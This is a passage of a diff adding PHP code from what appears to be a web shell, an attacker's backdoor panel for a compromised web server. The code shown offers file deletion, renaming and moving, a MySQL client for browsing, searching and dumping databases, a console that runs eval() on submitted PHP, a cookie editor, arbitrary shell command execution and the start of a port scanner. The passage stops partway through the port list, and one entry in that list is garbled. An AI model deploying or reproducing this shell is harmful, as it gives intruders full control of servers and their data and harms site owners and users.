+					."\n".'<font class=achtung>(!)</font> Do you really want to <font class=highlight_txt>DELETE '.$_GET['dxfile'].'</font> ?'
+					."\n".'<div align=right><input type=submit name="dx_ok" value="No" class=bt_No><input type=submit name="dx_ok" value="Yes" class=bt_Yes>'
+					."\n".'</td></tr></table>';
+		print "\n".'</form>';
+		}
+	}
+
+########
+########   File Rename
+########
+if ($_GET['dxmode']=='F_REN')
+	{
+	if (isset($_POST['dxparam']))
+		{
+		if (!rename($_GET['dxfile'], dirname($_GET['dxfile']).'/'.$_POST['dxparam']))
+			print DxError('Unable to rename. Perms?...<br>');
+			else
+			{
+			print "\n".'Rename( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.dirname($_GET['dxfile']).'/'.$_POST['dxparam'].'</font> ) <b>OK</b>';
+			DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+			}
+		}
+		else
+		{
+		print "\n".'<form action="'.DxURL('leave', 'dxmode,dxfile').'" method=POST>';
+		print "\n".'<input type=text name="dxparam" value="'.basename($_GET['dxfile']).'" style="width:80%">';
+		print "\n".'<input type=submit value="Rename" class="submit"></form>';
+		}
+	}
+
+########
+########   File Copy
+########
+if ($_GET['dxmode']=='F_COP')
+	{
+	if (!is_file($_GET['dxfile'])) die(DxError('Don\'t even think about copuing directories! =))'));
+
+	$newname=$_GET['dxfile'].'__DxS_COPY_'.DxRandomChars(3);
+	if (($extpos=strrpos($_GET['dxfile'], '.'))>strrpos($_GET['dxfile'], '/')) /* file has an extension */
+		$newname=substr($_GET['dxfile'], 0, $extpos).'__DxS_COPY_'.DxRandomChars(3).substr($_GET['dxfile'], $extpos);
+	print $newname;
+	if (!copy($_GET['dxfile'], $newname))
+		print DxError('Unable to copy. Perms?...<br>');
+		else
+		{
+		print "\n".'Copy( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.$newname.'</font> ) <b>OK</b>';
+		DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+		}
+	}
+
+########
+########   File Move
+########
+if ($_GET['dxmode']=='F_MOV')
+	{
+	if (isset($_POST['dxparam']))
+		{
+		if (!rename($_GET['dxfile'], $_POST['dxparam']))
+			print DxError('Unable to rename. Perms? Or no path?...<br>');
+			else
+			{
+			print "\n".'Move( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.$_POST['dxparam'].'</font> ) <b>OK</b>';
+			DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_POST['dxparam'])));
+			}
+		}
+		else
+		{
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');
+		print "\n".'<form action="'.DxURL('leave', 'dxmode,dxfile').'" method=POST>';
+		print "\n".'<input type=text name="dxparam" value="'.DxFileOkaySlashes(realpath($_GET['dxfile'])).'" style="width:80%">';
+		print "\n".'<input type=submit value="M0ve" class="submit"></form>';
+		}
+	}
+
+if (substr($_GET['dxmode'],0,2)=='F_')
+	{/* file actions */
+	print "\n\n".'<br><br>'.'<a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])).'">[Go DIR]</a>';
+	}
+
+		###################################
+
+########
+########   SQL Maintenance
+########
+if ($_GET['dxmode']=='SQL')
+	{	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p']))
+		{		print "\n".'<h2>MySQL connection</h2>';
+		print "\n".'<form action="'.DxURL('kill', '').'" method=GET align=center>';
+		DxGETinForm('leave', 'dxmode');
+		print "\n".'<br>Serv: <input type=text name="dxsql_s" value="localhost" style="width:200pt">';
+		print "\n".'<br>Login:<input type=text name="dxsql_l" value="" 	 	style="width:200pt">';
+		print "\n".'<br>Passw:<input type=password name="dxsql_p" value="" 	style="width:200pt">';
+		print "\n".'<br><input type=submit value="C0nnect" class="submit" style="width:200pt;"></form>';
+		die();
+		}
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	$mysqlver=mysql_fetch_row(mysql_query("SELECT VERSION()"));
+	print str_repeat('&nbsp;',15).'MySQL version: <font class="highlight_txt">'.$mysqlver[0].'</font>';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW DATABASES;', true), $DATABASES, true);
+	for ($i=0;$i<count($DATABASES);$i++)
+		$DATABASES[$i][1]=mysql_num_rows(DxMySQLQ('SHOW TABLES FROM `'.$DATABASES[$i][0].'`;', false));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0>'
+				.'<tr><td class=h2_oneline><h1>DB:</h1></td>';
+	if (!isset($_GET['dxsql_d']))
+		{
+		print "\n".'<td class=h2_oneline style="border-width:0pt;">';
+		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxsql_s,dxsql_l,dxsql_p');
+		print "\n".'<SELECT name="dxsql_d" onchange="this.form.submit()">';
+		print "\n\t".'<OPTION value="">&lt;Server&gt;</OPTION>';
+		for ($i=0;$i<count($DATABASES);$i++)
+		print "\n\t".'<OPTION value="'.$DATABASES[$i][0].'">'
+			.'['.DxZeroedNumber($DATABASES[$i][1],3).']'.' '.$DATABASES[$i][0]
+			.'</OPTION>';
+		print "\n".'</SELECT><input type=submit value="-&gt;" class=submit"></form></td>';
+		print "\n".'</tr></table>';
+		die();
+		}
+		else print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxsql_d').'" class=no>[CH]</a></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxmode').'&dxmode=SQLS" class=no>[Search in tables...]</a></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxmode').'&dxmode=SQLD" class=no>[Dump...]</a></td>'
+						.'</tr></table>';
+
+	if (!empty($_GET['dxsql_d']))
+		if (!mysql_select_db($_GET['dxsql_d']))
+			die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+	if (!empty($_GET['dxsql_d']))
+		{
+		print "\n\t".'<table  border=0 cellspacing=0 cellpadding=0>';
+		print "\n\t".'<caption>Tables:</caption>';
+		DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+		for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+		asort($TABLES);
+		for ($i=0;$i<count($TABLES);$i++)
+			{
+			DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);			print "\n\t".'<tr><td class="listing"><nobr>'.(($TRowCnt[0][0]>0)?'&gt; ':'&nbsp;&nbsp;').$TABLES[$i].'</td></tr>';
+			}
+		print "\n\t".'</table>';
+		}
+	print "\n".'</td><td  width=100%>';
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'[?] Can run several querys if divided by ";"<br>If smth is wrong with charset, write first: SET NAMES cp1251;';
+	print "\n".'<textarea name="dxsql_q" rows=10 style="width:100%;">'.((empty($_POST['dxsql_q']))?'':$_POST['dxsql_q']).'</textarea>';
+	print "\n".'<div align=right>'
+				.'<input type=submit value="Query" class="submit"> '
+				.'<input type=submit name="dxparam" value="Download Query" class="submit"></div></form>'
+				.'<br>';
+
+	if (empty($_POST['dxsql_q'])) die('</td></tr></table>');
+	$_POST['dxsql_q']=explode(';', $_POST['dxsql_q']);
+
+	foreach ($_POST['dxsql_q'] as $CUR_Q)
+		{		if (empty($CUR_Q)) continue;
+		$CUR_Q.=';';
+
+		$num=DxMySQL_FetchResult(DxMySQLQ($CUR_Q, true), $FETCHED, false);
+		if ($num<=0) continue;
+
+		print "\n\n\n".'<table border=0 cellspacing=0 cellpadding=0><caption>'.$CUR_Q.'</caption>';
+
+		$INDEXES=array_keys($FETCHED[0]);
+		print "\n\t".'<tr><td class="listing" colspan='.(count($INDEXES)+1).'>&gt;&gt; Fetched: '.$num. str_repeat('&nbsp;', 10). 'Affected: '.mysql_affected_rows().'</td></tr>';
+		print "\n\t".'<tr><td class="listing"><div align=center  class="highlight_txt">###</td>';
+		foreach ($INDEXES as $key) print '<td class="listing"><div align=center class="highlight_txt">'.$key.'</td>';
+		print '</tr>';
+
+		for ($l=0;$l<count($FETCHED);$l++)
+			{
+			print "\n\t".'<tr><td class="listing" width=40><div align=right class="highlight_txt">'.$l.'</td>';
+			for ($i=0; $i<count($INDEXES); $i++)
+				print '<td class="listing"> '.DxDecorVar($FETCHED[$l][ $INDEXES[$i] ], true).'</td>';
+			}
+
+		print "\n".'</table><br>';
+		}
+	print "\n".'</td></tr></table>';
+	}
+
+########
+########   SQL Search
+########
+if ($_GET['dxmode']=='SQLS')
+	{
+	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'], $_GET['dxsql_d']))	die(DxError('SQL server/login/password/database are not set'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0><tr><td class=h2_oneline><h2>DB:</h2></td>';
+	print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td></tr></table>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+	for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+	asort($TABLES);
+
+	if (isset($_POST['dxsqlsearch']['txt']))
+		if (get_magic_quotes_gpc()==1) $_POST['dxsqlsearch']['txt']=stripslashes($_POST['dxsqlsearch']['txt']);
+
+	print "\n\t".'<SELECT MULTIPLE name="dxsqlsearch[tables][]" SIZE=30>';
+	for ($i=0;$i<count($TABLES);$i++)
+		{
+		DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);
+		if ($TRowCnt[0][0]>0)
+			print "\n\t".'<OPTION value="'.$TABLES[$i].'" '
+				.(  (isset($_POST['dxsqlsearch']['tables']))?   ((in_array($TABLES[$i], $_POST['dxsqlsearch']['tables']))?'SELECTED':'')   :'SELECTED'  ).'>'
+				.$TABLES[$i].'</OPTION>';
+		}
+	print "\n\t".'</SELECT>';
+	print "\n".'</td><td  width=100%>';
+	print "\n".'<input type=text name="dxsqlsearch[txt]" style="width:100%;" value="'.((empty($_POST['dxsqlsearch']['txt']))?'':str_replace('"', '&quot;', $_POST['dxsqlsearch']['txt'])).'">';
+	print "\n".'<br>';
+	foreach (array('Any', 'Each', 'Exact', 'RegExp') as $cur_rad)
+		print '<input type=radio name="dxsqlsearch[mode]" value="'.strtolower($cur_rad).'" '
+			.(  (isset($_POST['dxsqlsearch']['mode']))?   (($_POST['dxsqlsearch']['mode']==strtolower($cur_rad))?'CHECKED':'')   :(($cur_rad=='Any')?'CHECKED':'')  )
+			.' class=radio>'.$cur_rad.'&nbsp;&nbsp;&nbsp;';
+	print "\n".'<div align=right><input type=submit value="Search..." class=submit style="width:100pt;"></div>';
+	print "\n".'</form>';
+
+	if (!isset($_POST['dxsqlsearch'])) die('</td></tr></table>');
+
+	if (empty($_POST['dxsqlsearch']['tables'])) die(DxError('No tables selected'));
+
+	if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'each'))) $_POST['dxsqlsearch']['txt']=explode(' ', mysql_real_escape_string($_POST['dxsqlsearch']['txt']));
+		else $_POST['dxsqlsearch']['txt']=array($_POST['dxsqlsearch']['txt']);
+
+
+	$GLOBALFOUND=0;
+	foreach ($_POST['dxsqlsearch']['tables'] as $CUR_TABLE)
+		{		$Q='SELECT * FROM `'.$CUR_TABLE.'` WHERE ';
+		$Q_ARR=array();
+		DxMySQL_FetchResult(DxMySQLQ('SHOW COLUMNS FROM `'.$CUR_TABLE.'`;', true), $COLS, true);   for ($i=0; $i<count($COLS);$i++) $COLS[$i]=$COLS[$i][0];
+		foreach ($COLS as $CUR_COL)
+			{			if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'each', 'exact')))
+				{				for ($i=0;$i<count($_POST['dxsqlsearch']['txt']);$i++)
+				$Q_ARR[]=$CUR_COL.' LIKE "%'.($_POST['dxsqlsearch']['txt'][$i]).'%"';
+				}
+				else $Q_ARR[]=$CUR_COL.' REGEXP '.$_POST['dxsqlsearch']['txt'][0];
+
+			if ($_POST['dxsqlsearch']['mode']=='each')
+				{				$Q_ARR_EXACT[]=implode(' AND ', $Q_ARR);
+				$Q_ARR=array();
+				}
+			}
+		if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'exact'))) $Q.=implode(' OR ', $Q_ARR).';';
+		if ($_POST['dxsqlsearch']['mode']=='each') $Q.=' ( '.implode(' ) OR ( ', $Q_ARR_EXACT).' );';
+		if ($_POST['dxsqlsearch']['mode']=='regexp') $Q.=' ( '.implode(' ) OR ( ',$Q_ARR).' );';
+
+		/* $Q is ready */
+
+		if (($num=DxMySQL_FetchResult(DxMySQLQ($Q, true), $FETCHED, true))>0)
+			{
+			$GLOBALFOUND+=$num;			print "\n\n".'<table border=0 cellspacing=0 cellpadding=0 align=center><caption>'.$num.' matched in '.$CUR_TABLE.' :</caption>';
+			print "\n\t".'<tr><td class=listing><font class="highlight_txt">'.implode('</td><td class=listing><font class="highlight_txt">', $COLS).'</td></tr>';
+			for ($l=0;$l<count($FETCHED);$l++)
+				{
+				print "\n\t".'<tr>';
+				for ($i=0; $i<count($FETCHED[$l]); $i++) print '<td class="listing"> '.DxDecorVar($FETCHED[$l][$i], true).'</td>';
+				print '</tr>';
+				}
+			print "\n".'</table><br>';
+			}
+		}
+	print "\n".'<br>Total: '.$GLOBALFOUND.' matches';
+
+	print "\n".'</td></tr></table>';
+	}
+
+########
+########   SQL Dump
+########
+if ($_GET['dxmode']=='SQLD')
+	{	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'], $_GET['dxsql_d']))	die(DxError('SQL server/login/password/database are not set'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0><tr><td class=h2_oneline><h2>DB:</h2></td>';
+	print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td></tr></table>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+	for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+	asort($TABLES);
+
+	print "\n\t".'<SELECT MULTIPLE name="dxsql_tables[]" SIZE=30>';
+	for ($i=0;$i<count($TABLES);$i++)
+		{
+		DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);
+		if ($TRowCnt[0][0]>0)
+			print "\n\t".'<OPTION value="'.$TABLES[$i].'" SELECTED>'.$TABLES[$i].'</OPTION>';
+		}
+	print "\n\t".'</SELECT>';
+	print "\n".'</td><td  width=100%>You can set a pre-dump-query(s) (ex: SET NAMES cp1251; ):';
+	print "\n".'<input type=text name="dxsql_q" style="width:100%;">';
+	print "\n".'<br>';
+	print "\n".'<div align=right>'
+		.'GZIP <input type=checkbox name="dx_gzip" value="Yeah, baby">'.str_repeat('&nbsp;', 10)
+		.'<input type=submit value="Dump!" class=submit style="width:100pt;"></div>';
+	print "\n".'</form>';
+	}
+
+		###################################
+
+########
+########   PHP Console
+########
+if ($_GET['dxmode']=='PHP')
+	{
+	if (isset($_GET['dxval'])) $_POST['dxval']=$_GET['dxval'];
+
+	print "\n".'<table border=0 align=right><tr><td class=h2_oneline>Do</td><td class="linelisting">';
+	$PRESETS=array_keys($GLOB['VAR']['PHP']['Presets']);
+	for ($i=0; $i<count($PRESETS);$i++)
+		print "\n\t".'<a href="'.DxURL('leave', 'dxmode').'&dxval=dxpreset__'.$PRESETS[$i].'" class=no>['.$PRESETS[$i].']</a>'
+						.(  ($i==(count($PRESETS)-1))?'':str_repeat('&nbsp;',3)  );
+	print "\n\n".'</td></tr></table><br><br>';
+
+	if (isset($_POST['dxval']))
+		if (strpos($_POST['dxval'], 'dxpreset__')===0)
+			{			$_POST['dxval']=substr($_POST['dxval'], strlen('dxpreset__'));
+			if (!isset($GLOB['VAR']['PHP']['Presets'][$_POST['dxval']])) die(DxError('Undeclared preset'));
+			$_POST['dxval']=$GLOB['VAR']['PHP']['Presets'][$_POST['dxval']];
+			}
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=15 style="width:100%;">'.((isset($_POST['dxval']))?$_POST['dxval']:'').'</textarea>';
+	print "\n".'<div align=right><input type=submit value="Eval" class="submit" style="width:200pt;"></div>';
+	print "\n".'</form>';
+	if (isset($_POST['dxval']))
+		{		print str_repeat("\n", 10).'<!--php_eval-->'."\n\n".'<table border=0 width=100%><tr><td class=listing>'."\n\n";
+		eval($_POST['dxval']);
+		print str_repeat("\n", 10).'<!--/php_eval-->'.'</td></tr></table>';
+		}
+	}
+
+		###################################
+
+########
+########  Cookies Maintenance
+########
+if ($_GET['dxmode']=='COOK')
+	{
+	if ($DXGLOBALSHIT) DxWarning('Set cookie may fail. This is because "'.basename($_SERVER['PHP_SELF']).'" has fucked up the output with it\'s shit =(');	print 'Found <font class="highlight_txt">'.($CNT=count($_COOKIE)).' cookie'.(($CNT==1)?'':'s');
+
+	print "\n".'<div align=right><a href="'.DxURL('leave', '').'">[RELOAD]</a></div>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0 align=center><tr><td class=linelisting><div align=center><font class="highlight_txt">Cookie name</td><td class=linelisting><div align=center><font class="highlight_txt">Value</td></tr>';
+	for ($look_len=1, $maxlen=0; $look_len>=0;$look_len--)
+		{
+		if ($maxlen>100) $maxlen=100;
+		if ($maxlen<30) $maxlen=30;
+		$maxlen+=3;
+		for ($INDEXES=array_keys($_COOKIE), $i=0;$i<count($INDEXES);$i++)
+			{
+			if ($look_len) {if (strlen($_COOKIE[ $INDEXES[$i] ])>$maxlen) {$maxlen=strlen($_COOKIE[ $INDEXES[$i] ]);} continue;}
+			print "\n".'<tr><td class=linelisting>'.$INDEXES[$i].'</td>'
+					.'<td class=linelisting><input type=text '
+							.'name="dxparam['.str_replace(array('"', "\n", "\r", "\t"),  array('&quot;',' ',' ',' '), $INDEXES[$i]).']" '
+							.'value="'.str_replace(array('"', "\n", "\r", "\t"), array('&quot;',' ',' ',' '), $_COOKIE[ $INDEXES[$i] ]).'" '
+							.'SIZE='.$maxlen.'></td>'
+					.'</tr>';
+			}
+		if (!$look_len)
+			{
+			print "\n".'<tr><td colspan=2><div align=center>[Set new cookie]</td></tr>';
+			print "\n".'<tr><td class=linelisting><input type=text name="dxparam[DXS_NEWCOOK][NAM]" value="" style="width:99%;"></td>'
+					.'<td class=linelisting><input type=text name="dxparam[DXS_NEWCOOK][VAL]" value="" SIZE='.$maxlen.'></td>'
+					.'</tr>';			print "\n".'<tr><td class=linelisting colspan=2 style="text-align:center;">'
+					.'<input type=submit value="Save" class="submit" style="width:50%;">'
+					.'</td></tr>';
+			}
+		}
+	print "\n".'</table></form>';
+	}
+
+		###################################
+
+########
+########   Command line
+########
+if ($_GET['dxmode']=='CMD')
+	{
+	print "\n".'<table border=0 align=right><tr><td class=h2_oneline>Do</td><td>';
+	print "\n".'<SELECT name="selector" onchange="document.getElementById(\'dxval\').value+=document.getElementById(\'selector\').value+\'\n\'" style="width:200pt;">';
+	print "\n\t".'<OPTION></OPTION>';
+	$PRESETS=array_keys($GLOB['VAR']['CMD']['Presets']);
+	for ($i=0; $i<count($PRESETS);$i++)
+		print "\n\t".'<OPTION value="'.str_replace('"','&quot;',$GLOB['VAR']['CMD']['Presets'][ $PRESETS[$i] ]).'">'.$PRESETS[$i].'</OPTION>';
+	print "\n\n".'</SELECT></td></tr></table><br><br>';
+
+	if (isset($_POST['dxval']))
+		if (strpos($_POST['dxval'], 'dxpreset__')===0)
+			{
+			$_POST['dxval']=substr($_POST['dxval'], strlen('dxpreset__'));
+			if (!isset($GLOB['VAR']['CMD']['Presets'][$_POST['dxval']])) die(DxError('Undeclared preset'));
+			$_POST['dxval']=$GLOB['VAR']['CMD']['Presets'][$_POST['dxval']];
+			}
+
+	$warnstr=DxExecNahuj('',$trash1, $trash2);
+	if (!$warnstr[1]) DxWarning($warnstr[2]);	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=5 style="width:100%;">'.((isset($_POST['dxval']))?$_POST['dxval']:'').'</textarea>';
+	print "\n".'<div align=right>'
+				.'<input type=submit value="Exec" class="submit" style="width:100pt;"> '
+				.'</div>';
+	print "\n".'</form>';
+	if (isset($_POST['dxval']))
+		{
+		$_POST['dxval']=split("\n", str_replace("\r", '', $_POST['dxval']));
+		for ($i=0; $i<count($_POST['dxval']); $i++)
+			{
+			$CUR=$_POST['dxval'][$i];
+			if (empty($CUR)) continue;
+
+			DxExecNahuj($CUR,$OUT, $RET);
+			print str_repeat("\n", 10).'<!--'.$warnstr[2].'("'.$CUR.'")-->'."\n\n".'<table border=0 width=100%><tr><td class=listing>'."\n\n";
+
+			print '<span style="position:absolute;left:10%;" class="highlight_txt">Return</span>';
+			print '<span style="position:absolute;right:30%;" class="highlight_txt">Output</span>';
+			print '<br><nobr>';
+			print "\n".'<textarea rows=10 style="width:20%;display:inline;">'.$CUR."\n\n".(	(is_array($RET))?implode("\n", $RET):$RET).'</textarea>';
+			print "\n".'<textarea rows=10 style="width:79%;display:inline;">'."\n".(	(is_array($OUT))?implode("\n", $OUT):$OUT).'</textarea>';
+			print '</nobr>';
+			print str_repeat("\n", 10).'<!--/'.$warnstr[2].'("'.$CUR.'")-->'."\n\n".'</td></tr></table>';
+			}
+		}
+	}
+
+		###################################
+
+########
+########   String functions
+########
+if ($_GET['dxmode']=='STR')
+	{
+	if (isset($_POST['dxval'], $_POST['dxparam']))
+		{		$crypted='';
+		if ($_POST['dxparam']=='md5') $crypted.=md5($_POST['dxval']);
+		if ($_POST['dxparam']=='sha1') $crypted.=sha1($_POST['dxval']);
+		if ($_POST['dxparam']=='crc32') $crypted.=crc32($_POST['dxval']);
+		if ($_POST['dxparam']=='2base') $crypted.=base64_encode($_POST['dxval']);
+		if ($_POST['dxparam']=='base2') $crypted.=base64_decode($_POST['dxval']);
+		if ($_POST['dxparam']=='2HEX') for ($i=0;$i<strlen($_POST['dxval']);$i++) $crypted.=strtoupper(dechex(ord($_POST['dxval'][$i]))).' ';
+		if ($_POST['dxparam']=='HEX2') {$_POST['dxval']=str_replace(' ','',$_POST['dxval']); for ($i=0;$i<strlen($_POST['dxval']);$i+=2) $crypted.=chr(hexdec($_POST['dxval'][$i].$_POST['dxval'][$i+1]));}
+		if ($_POST['dxparam']=='2DEC') {$crypted='CHAR('; for ($i=0;$i<strlen($_POST['dxval']); $i++) $crypted.=ord($_POST['dxval'][$i]).(($i<(strlen($_POST['dxval'])-1))?',':')');}
+		if ($_POST['dxparam']=='2URL') $crypted.=urlencode($_POST['dxval']);
+		if ($_POST['dxparam']=='URL2') $crypted.=urldecode($_POST['dxval']);
+		}
+	if (isset($crypted)) print $_POST['dxparam'].'(<font class="highlight_txt"> '.$_POST['dxval'].' </font>) = ';
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=20 style="width:100%;">'.((isset($crypted))?$crypted:'').'</textarea>';
+	print "\n".'<div align=right>'
+		.'<input type=submit name="dxparam" value="md5" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="sha1" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="crc32" class="submit" style="width:50pt;"> '.str_repeat('&nbsp;', 5)
+		.'<input type=submit name="dxparam" value="2base" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="base2" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2HEX" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="HEX2" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2DEC" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="2URL" class="submit" style="width:50pt;"> '
+		.'<input type=submit name="dxparam" value="URL2" class="submit" style="width:50pt;"> '
+		.'</div>';
+	print "\n".'</form>';
+	}
+
+########
+########   Port scaner
+########
+if ($_GET['dxmode']=='PRT')
+	{
+	print '[!] For complete portlist go to <a href="http://www.iana.org/assignments/port-numbers" target=_blank>http://www.iana.org/assignments/port-numbers</a>';	if (isset($_POST['dxportscan']) or isset($_GET['dxparam']))
+		$DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Utility',3=>'Compression Process',5=>'rje (Remote Job Entry)',7=>'echo',9=>'discard',11=>'systat',13=>'daytime',15=>'netstat',17=>'quote of the day',18=>'send/rwp',19=>'character generator',20=>'ftp-data',21=>'ftp',22=>'ssh, pcAnywhere',23=>'Telnet',25=>'SMTP (Simple Mail Transfer)',27=>'ETRN (NSW User System FE)',29=>'MSG ICP',31=>'MSG Authentication',33=>'dsp (Display Support Protocol)',37=>'time',38=>'RAP (Route Access Protocol)',39=>'rlp (Resource Location Protocol)',41=>'Graphics',42=>'nameserv, WINS',43=>'whois, nickname',44=>'MPM FLAGS Protocol',45=>'Message Processing Module [recv]',46=>'MPM [default send]',47=>'NI FTP',48=>'Digital Audit Daemon',49=>'TACACS, Login Host Protocol',50=>'RMCP, re-mail-ck',53=>'DNS',57=>'MTP (any private terminal access)',59=>'NFILE',60=>'Unassigned',61=>'NI MAIL',62=>'ACA Services',63=>'whois++',64=>'Communications Integrator (CI)',65=>'TACACS-Database Service',66=>'Oracle SQL*NET',67=>'bootps (Bootstrap Protocol Server)',68=>'bootpd/dhcp (Bootstrap Protocol Client)',69=>'Trivial File Transfer Protocol (tftp)',70=>'Gopher',71=>'Remote Job Service',72=>'Remote Job Service',73=>'Remote Job Service',74=>'Remote Job Service',75=>'any private dial out service',76=>'Distributed External Object Store',77=>'any private RJE service',78=>'vettcp',79=>'finger',80=>'World Wide Web HTTP',81=>'HOSTS2 Name Serve',82=>'XFER Utility',83=>'MIT ML Device',84=>'Common Trace Facility',85=>'MIT ML Device',86=>'Micro Focus Cobol',87=>'any private terminal link',88=>'Kerberos, WWW',89=>'SU/MIT Telnet Gateway',90=>'DNSIX Securit Attribute Token Map',91=>'MIT Dover Spooler',92=>'Network Printing Protocol',93=>'Device Control Protocol',94=>'Tivoli Object Dispatcher',95=>'supdup',96=>'DIXIE',98=>'linuxconf',99=>'Metagram Relay',100=>'[unauthorized use]',101=>'HOSTNAME',102=>'ISO, X.400, ITOT',103=>'Genesis Point-to&#14144;&#429;oi&#65535;&#65535; T&#0;&#0;ns&#0;&#0;et',104=>'ACR-NEMA Digital Imag. & Comm. 300',105=>'CCSO name server protocol',106=>'poppassd',107=>'Remote Telnet Service',108=>'SNA Gateway Access Server',109=>'POP2',110=>'POP3',111=>'Sun RPC Portmapper',112=>'McIDAS Data Transmission Protocol',113=>'Authentication Service',115=>'sftp (Simple File Transfer Protocol)',116=>'ANSA REX Notify',117=>'UUCP Path Service',118=>'SQL Services',119=>'NNTP',120=>'CFDP',123=>'NTP',124=>'SecureID',129=>'PWDGEN',133=>'statsrv',135=>'loc-srv/epmap',137=>'netbios-ns',138=>'netbios-dgm (UDP)',139=>'NetBIOS',143=>'IMAP',144=>'NewS',150=>'SQL-NET',152=>'BFTP',153=>'SGMP',156=>'SQL Service',161=>'SNMP',175=>'vmnet',177=>'XDMCP',178=>'NextStep Window Server',179=>'BGP',180=>'SLmail admin',199=>'smux',210=>'Z39.50',213=>'IPX',218=>'MPP',220=>'IMAP3',256=>'RAP',257=>'Secure Electronic Transaction',258=>'Yak Winsock Personal 